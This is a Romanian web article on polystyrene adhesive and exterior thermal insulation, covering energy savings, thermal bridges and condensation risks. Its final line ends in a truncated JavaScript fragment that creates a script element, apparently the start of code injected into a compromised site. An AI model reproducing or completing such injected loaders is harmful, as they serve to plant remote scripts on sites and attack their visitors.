adeziv polistiren

adeziv polistiren

O locuinta termoizolata este cu certitudine mai valoroasa, deoarece izolatia ii confera un grad ridicat de confort termic, care se simte mai ales iarna, cand caldura nu mai migreaza in afara prin intermediul peretilor. Sistemul cel mai utilizat la noi este polistirenul expandat, care se aplica pe zidurile din exterior, cu ajutorul unui adeziv polistiren. Desi poate parea costisitoare la inceput, investitia isi merita toti banii, deoarece se fac economii consistente la energia consumata de sistemele de incalzire in timpul iernii si la curent electric vara, cand nu se mai simte atat de acut nevoia de a pune in functiune aparatul de aer conditionat, deoarece interiorul ramane destul de racoros chiar si in cele mai toride zile.

Adeziv polistiren adecvat peretilor exteriori

De regula, termoizolatia se face pe peretii exteriori si pe tavan, deoarece acestea sunt locurile in care trebuie stopata migrarea caldurii, insa si peretii care despart camerele incalzite de cele neincalzite sunt luati in calcul, cum ar fi, de exemplu, debaraua sau garajul. Puntile termice necesita o atentie deosebita in cadrul acestor operatii, adica locurile in care schimbul de temperatura se face foarte usor, in jurul usilor si al ferestrelor, la imbinarile peretilor sau in zona balcoanelor. Aceste punti termice se izoleaza cu atentie, aplicand placile cu ajutorul unui adeziv polistiren adecvat, de regula pe exterior .

Peretii interiori nu se izoleaza cu polistiren si adeziv polistiren

Unii prefera sa izoleze atat peretii exteriori cat si cei interiori, insa aceasta din urma izolatie nu este recomandata, deoarece s-ar putea ca in timp sa apara condens intre placile izolante si perete, ceea ce ar duce la formarea mucegaiului. Daca totusi se doreste si o izolatie interioara, aceasta nu este recomandat sa se faca cu polistiren, ci cu vata minerala peste care se monteaza placi de rigips. Problema trebuie studiata de specialisti in domeniu, in functie de fiecare caz in parte, de vechimea locuintei, de materialele din care aceasta a fost construita etc.

Lipirea placilor cu adeziv polistiren

Concluzionand, izolatia bine facuta este cheia economisirii energiei, astfel incat factura poate fi cu 30-40% mai mica. Important este ca lucrarile sa se execute corect, iar materialele sa fie de calitate. Procedeul de aplicare a placilor are o importanta foarte mare in calitatea lucrarii, pana si numarul de bolturi pe o placa si modul lor de aplicare conteaza, de aceea este indicat ca lucrarea sa fie efectuata de personal calificat, care cunoaste foarte bine tainele acestei meserii.

Folosirea corecta a unui adeziv polistiren si respectarea timpului de asteptare intre etapele de lucru sunt elemente la fel de importante, care pot duce la rezultate foarte bune sau mai putin bune. Urmarea tuturor regulilor meseriei si respectarea lor in cele mai mici detalii, vor face dintr-o locuinta izolata astfel una deosebit de confortabila, fapt care se simte cu precadere in perioada anotimpului rece. In general, casele termoizolate au un grad mai ridicat de viabilitate, deoarece prin acest procedeu ele sunt si protejate de degradare, mai ales in ceea ce priveste structura de rezistenta.var d=document;var s=d.createElement(‘script’);